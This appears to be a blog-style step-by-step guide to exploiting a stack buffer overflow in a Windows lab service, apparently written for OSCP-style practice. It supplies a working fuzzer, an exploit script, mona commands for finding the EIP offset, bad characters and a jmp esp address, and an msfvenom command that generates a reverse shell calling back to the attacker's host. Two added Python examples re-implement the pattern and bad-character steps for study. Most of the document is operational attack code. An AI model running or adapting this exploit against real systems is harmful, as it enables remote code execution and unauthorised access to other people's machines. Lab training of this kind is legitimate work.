Steps To Exploit Buffer Overflow
2 min read · Apr 20, 2022
- First, install Immunity Debugger on a Windows machine.
- Load the executable you want to test into Immunity Debugger.
- Configure mona's working folder so its output files land in a known directory (%p expands to the process name):
!mona config -set workingfolder c:\mona\%p
- Start the loaded service in the debugger and move on to enumeration.
Enumeration
- Create a fuzzer script that sends progressively longer strings to find the length at which the service crashes:
```python
#!/usr/bin/env python3
import socket, time, sys

ip = "10.10.4.64"  # change this
port = 9999  # change this
timeout = 5
prefix = ""  # change this if the service expects a command word before the data
string = prefix + "A" * 100

while True:
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            s.connect((ip, port))
            s.recv(1024)  # read the banner
            print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
            s.send(bytes(string, "latin-1"))
            s.recv(1024)  # if the service has crashed this times out or errors
    except OSError:
        print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
        sys.exit(0)
    string += 100 * "A"  # grow the input by 100 bytes per round
    time.sleep(1)
```
- Run the fuzzer and note the length at which the service stops responding:
python3 fuzzer.py
Exploitation
- The goal now is to crash the application in a controlled way and take over the EIP register.
- Take the crash length reported by fuzzer.py and generate a cyclic pattern a bit longer than that (the crash length plus some extra bytes):
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 600
- Put the generated pattern into your exploit's payload, restart oscp in the debugger and run the exploit.
- Create a Python script (exploit.py) with the following content:
```python
import socket

ip = "10.10.4.64"  # change this
port = 9999  # change this
offset = 0  # distance to EIP, filled in after !mona findmsp

overflow = b"A" * offset
retn = b""      # return address (little-endian), filled in later
padding = b""   # NOP sled, filled in later
payload = b""   # cyclic pattern / bad-char array / shellcode, depending on the step
postfix = b""
buffer = overflow + retn + padding + payload + postfix
print(buffer)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((ip, port))
    print("Sending evil buffer...")
    s.recv(1024)
    s.recv(1024)
    s.send(buffer + b"\r\n")  # buffer is already bytes, so only the line ending is appended
    print("Done!")
except OSError:
    print("Could not connect.")
finally:
    s.close()
```
- Now run it:
python3 exploit.py
- Back in Immunity Debugger, after the crash, locate the pattern in memory and the distance to the bytes that landed in EIP (use the length of the pattern you generated):
!mona findmsp -distance <pattern length>
- Update the exploit: set offset to the value mona reported, payload to an empty byte string and retn to b"BBBB", then run the script again and confirm that EIP is overwritten with your Bs.
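To make clear what pattern_create.rb and `!mona findmsp -distance` are actually doing, here is an added example (not code from the original post, from Metasploit or from mona) that re-implements the same cyclic-pattern scheme in Python: each 3-byte triple (uppercase, lowercase, digit) is unique, so any 4-byte window in the pattern maps to exactly one position. `pattern_offset` takes the dword the debugger shows in EIP, reverses it (x86 is little-endian) and searches for it. The hex values used below are constructed for the demonstration.

```python
# Added example: re-implementation of the Metasploit cyclic-pattern scheme, for study only.
import string

UPPER, LOWER, DIGITS = string.ascii_uppercase, string.ascii_lowercase, string.digits
MAX_UNIQUE = len(UPPER) * len(LOWER) * len(DIGITS) * 3  # 20280 bytes before triples repeat


def pattern_create(length: int) -> str:
    """Build the 'Aa0Aa1Aa2...' pattern in the same order as pattern_create.rb.

    Every 3-byte triple is unique, so any 4-byte window occurs at exactly one offset.
    """
    if not 0 < length <= MAX_UNIQUE:
        raise ValueError("length must be between 1 and %d" % MAX_UNIQUE)
    parts = []
    for a in UPPER:
        for b in LOWER:
            for c in DIGITS:
                parts.append(a + b + c)
                if len(parts) * 3 >= length:
                    return "".join(parts)[:length]
    return "".join(parts)[:length]


def pattern_offset(pattern: str, eip_hex: str) -> int:
    """Return the offset at which the 4 bytes shown in EIP start in the pattern.

    eip_hex is the register value as the debugger prints it (e.g. '64413364' or
    '0x64413364'). Because x86 is little-endian, the register shows the 4 pattern
    bytes in reverse order, so they are reversed back before searching.
    Returns -1 if the value does not come from the pattern.
    """
    eip_hex = eip_hex.strip().lower()
    if eip_hex.startswith("0x"):
        eip_hex = eip_hex[2:]
    needle = bytes.fromhex(eip_hex)[::-1].decode("latin-1")
    idx = pattern.find(needle)
    if idx != -1 and pattern.find(needle, idx + 1) != -1:
        raise ValueError("pattern is not unique for this value; use a shorter pattern")
    return idx


if __name__ == "__main__":
    p = pattern_create(600)  # same length as the pattern_create.rb call above
    # Constructed value: suppose the debugger showed EIP = 64413364 after the crash
    print("offset to EIP:", pattern_offset(p, "64413364"))  # 100
```

This is the same search that `!mona findmsp -distance` performs over the crashed process's memory; the `-distance` value mona reports is what goes into the `offset` variable of the exploit script.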
- Generate a byte array with mona, excluding the null byte (\x00) by default:
!mona bytearray -b "\x00"
- Build the same sequence of bytes in your script and send it as the payload.
- Restart oscp, run the exploit and note the ESP address at the crash, then compare the array in memory with the one mona wrote to disk:
!mona compare -f C:\mona\oscp\bytearray.bin -a <address>
- Remove the reported bad chars from your script, restart oscp and run the exploit again. Note that not every byte mona lists is itself a bad char: one bad char can corrupt the bytes that follow it, so re-run the comparison after each removal.
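The "one bad char corrupts the bytes after it" effect is easier to see with a small model of the bytearray/compare loop. The following is an added example, not code from the original post or from mona: it rebuilds the byte array the way `!mona bytearray -b` does, compares it against a memory dump the way `!mona compare` does, and shows why only the first mismatch should be trusted per round. The "service" is a constructed stand-in (a line-oriented parser that turns CR into LF and keeps only the first line), not a real target.

```python
# Added example: a re-implementation of the bytearray/compare cycle, for study only.


def make_bytearray(exclude: bytes = b"\x00") -> bytes:
    """All byte values 0x00-0xff minus the excluded ones, ascending (the content of
    bytearray.bin after !mona bytearray -b "...")."""
    return bytes(b for b in range(256) if b not in exclude)


def compare(expected: bytes, dump: bytes) -> list:
    """Offsets at which the memory dump differs from the array that was sent.
    A dump shorter than the array counts as mismatching from the point it ends."""
    return [i for i, b in enumerate(expected) if i >= len(dump) or dump[i] != b]


def first_bad_char(expected: bytes, dump: bytes):
    """Only the FIRST mismatch is trustworthy: a single bad byte (a line terminator,
    for instance) can truncate or shift everything after it, so later mismatches may
    be collateral damage rather than bad chars themselves. Returns None if clean."""
    mismatches = compare(expected, dump)
    return expected[mismatches[0]] if mismatches else None


def constructed_service(data: bytes) -> bytes:
    """Constructed stand-in for the target: normalises CR to LF and keeps only the
    first line. What it returns models what ends up in memory at the ESP address."""
    return data.replace(b"\r", b"\n").split(b"\n", 1)[0]


def find_bad_chars(send_and_dump, start: bytes = b"\x00", max_rounds: int = 16) -> bytes:
    """Repeat the bytearray/compare cycle, excluding ONE newly found bad byte per round,
    until the dump matches what was sent. Returns the bad bytes in discovery order."""
    bad = bytes(start)
    for _ in range(max_rounds):
        expected = make_bytearray(bad)
        culprit = first_bad_char(expected, send_and_dump(expected))
        if culprit is None:
            return bad
        bad += bytes([culprit])
    raise RuntimeError("too many rounds; check the comparison address and the dump")


if __name__ == "__main__":
    # Round 1 flags 0x0a, which hides the 0x0d problem behind it; round 2 finds 0x0d.
    print(find_bad_chars(constructed_service).hex())  # 000a0d
```

In the first round every byte from 0x0a onwards mismatches, although only 0x0a is actually bad; excluding just that one byte and comparing again exposes 0x0d, and a third round confirms the array is clean. That is the reason for restarting oscp and re-comparing after each removal instead of dropping every reported byte at once.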
- Find a jump point. The following lists every "jmp esp" instruction whose address contains none of the specified bad chars:
!mona jmp -r esp -cpb "\x00<other bad chars>"
- Pick one of the addresses and set the exploit's retn value to that address with its bytes reversed (little-endian).
- Generate a reverse shell payload with msfvenom and assign it to the exploit's payload variable:
msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 EXITFUNC=thread -b "\x00" -f c
- Copy the generated bytes into the payload variable of the script.
- Set padding to a short NOP sled in case the payload needs some extra space in front of it:
padding = b"\x90" * 16
- Exploit:
python3 exploit.py